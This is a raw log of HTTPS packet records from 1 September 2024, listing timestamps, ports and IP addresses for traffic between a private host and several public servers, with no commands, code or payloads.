Sep 1, 2024 00:54:32.137253046 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.137373924 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.148596048 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.148607016 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.148823023 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.152051926 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.152126074 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.152129889 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.152314901 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.192507029 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.332077026 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.332175016 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:32.332254887 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.385262966 CEST	49717	443	192.168.2.6	40.113.103.199
Sep 1, 2024 00:54:32.385298014 CEST	443	49717	40.113.103.199	192.168.2.6
Sep 1, 2024 00:54:33.301017046 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:33.301064968 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:33.301188946 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:33.301707029 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:33.301727057 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:33.322544098 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.368505001 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466408014 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466463089 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466490030 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466519117 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.466530085 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466550112 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466593027 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.466595888 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466614962 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.466639996 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.467153072 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.467187881 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.467222929 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.467231989 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.467298985 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.471106052 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.515373945 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.515388012 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.516519070 CEST	443	49705	173.222.162.64	192.168.2.6
Sep 1, 2024 00:54:33.516735077 CEST	49705	443	192.168.2.6	173.222.162.64
Sep 1, 2024 00:54:33.554995060 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.555026054 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.555068016 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.555077076 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.555123091 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.555129051 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.555155039 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.555206060 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.612190008 CEST	49716	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:33.612215042 CEST	443	49716	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:33.771522045 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:33.771572113 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:33.771785021 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:33.803020000 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:33.803054094 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.025625944 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.025924921 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.025950909 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.026834011 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.026895046 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.274683952 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.274848938 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.274964094 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.274980068 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.307535887 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:34.307600021 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:34.307933092 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:34.311094999 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:34.311111927 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:34.324141026 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.443228006 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.471606016 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:34.471628904 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.472609997 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.472662926 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:34.496262074 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:34.496319056 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.541728020 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:34.541748047 CEST	443	49722	142.250.186.132	192.168.2.6
Sep 1, 2024 00:54:34.587512016 CEST	49722	443	192.168.2.6	142.250.186.132
Sep 1, 2024 00:54:34.679872036 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.679929018 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.680015087 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.749855042 CEST	49721	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:34.749882936 CEST	443	49721	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:34.766771078 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:34.808115959 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:34.964623928 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:34.964659929 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:34.965904951 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:34.965969086 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.023636103 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.023792982 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.064863920 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.064898968 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.107614040 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.142709017 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.160324097 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.160373926 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.160465002 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.160974979 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.160984039 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.161036968 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.161969900 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.161983013 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.162389994 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.162401915 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.184500933 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287453890 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287499905 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287530899 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287570000 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287580967 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.287606001 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.287626028 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.288054943 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.288083076 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.288110971 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.288119078 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.288162947 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.288496017 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.288542032 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.288583994 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.288592100 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.330259085 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.330267906 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.373964071 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.374167919 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.374262094 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.374293089 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.374334097 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.374346018 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.374383926 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.374387026 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.374429941 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.387418032 CEST	49724	443	192.168.2.6	172.66.47.137
Sep 1, 2024 00:54:35.387440920 CEST	443	49724	172.66.47.137	192.168.2.6
Sep 1, 2024 00:54:35.627397060 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.631830931 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.631854057 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.632961988 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.633047104 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.636039019 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.638906002 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.638926983 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.639955997 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.640032053 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.642379045 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.642539024 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.643487930 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.643562078 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.679421902 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.679466009 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.690161943 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.690186977 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.708276987 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:35.708326101 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:35.708633900 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:35.710199118 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:35.710239887 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:35.721620083 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.737063885 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.802160978 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.802223921 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.802572012 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.802890062 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.802917004 CEST	443	49725	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:35.802936077 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:35.802961111 CEST	49725	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.132462025 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.180505037 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.210263014 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.210293055 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.210349083 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.212205887 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.212218046 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.290673971 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.290837049 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.290879965 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.290931940 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.290935040 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.290968895 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.290986061 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.291148901 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.291208029 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.291218042 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.295285940 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.295342922 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.295353889 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.295377970 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.295497894 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.295543909 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.356597900 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:36.356686115 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:36.407550097 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:36.407596111 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:36.407979965 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:36.452542067 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:36.896233082 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.899868965 CEST	49726	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:36.899899006 CEST	443	49726	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:36.901305914 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.901328087 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.902374029 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.902445078 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.903740883 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.903800964 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.932126045 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:36.932146072 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:36.973507881 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.029443026 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.058078051 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.058141947 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.058204889 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.058815002 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.058829069 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.076504946 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.171118975 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.171204090 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.171340942 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.235766888 CEST	49729	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.235809088 CEST	443	49729	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.244426012 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.244513988 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.244723082 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.662503004 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.662549019 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.662565947 CEST	49727	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.662574053 CEST	443	49727	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.782458067 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.782499075 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.782604933 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.782917023 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:37.782927036 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:37.809146881 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.809588909 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:37.809618950 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.810693026 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:37.810753107 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.240103006 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.240307093 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.241292000 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.241311073 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.298528910 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.324596882 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.324629068 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.324829102 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.325306892 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.325319052 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.416151047 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.425756931 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.425883055 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:38.428045034 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:38.428059101 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.428379059 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.430269003 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:38.472511053 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.497788906 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497800112 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497838020 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497855902 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497863054 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497879982 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.497901917 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497920990 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.497961044 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.505331993 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.505338907 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.505383015 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.505390882 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.505426884 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.507107973 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.507113934 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.507133961 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.507141113 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.507165909 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.507169962 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.507211924 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.586174011 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.586185932 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.586225986 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.586250067 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.586260080 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.586266041 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.586292028 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.586321115 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.594140053 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.594170094 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.594203949 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.594208002 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.594225883 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.594245911 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.594275951 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.598243952 CEST	49731	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.598263979 CEST	443	49731	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.616714001 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:38.616754055 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:38.616820097 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:38.617136002 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:38.617151022 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:38.632783890 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.632807970 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.632863998 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.633327961 CEST	49735	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.633337975 CEST	443	49735	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.707545042 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.707623959 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.707742929 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:38.817603111 CEST	49732	443	192.168.2.6	184.28.90.27
Sep 1, 2024 00:54:38.817640066 CEST	443	49732	184.28.90.27	192.168.2.6
Sep 1, 2024 00:54:38.916129112 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.916398048 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.916433096 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.917516947 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.917594910 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.919308901 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.919384003 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.919851065 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:38.919858932 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:38.974266052 CEST	49733	443	192.168.2.6	162.254.39.141
Sep 1, 2024 00:54:39.071151018 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.071647882 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:39.071676016 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.072000980 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.072468042 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:39.072539091 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.072756052 CEST	49734	443	192.168.2.6	172.66.47.41
Sep 1, 2024 00:54:39.116507053 CEST	443	49734	172.66.47.41	192.168.2.6
Sep 1, 2024 00:54:39.217344046 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217370987 CEST	443	49733	162.254.39.141	192.168.2.6
Sep 1, 2024 00:54:39.217377901 CEST	443	49733	162.254.39.141	192.168.2.6
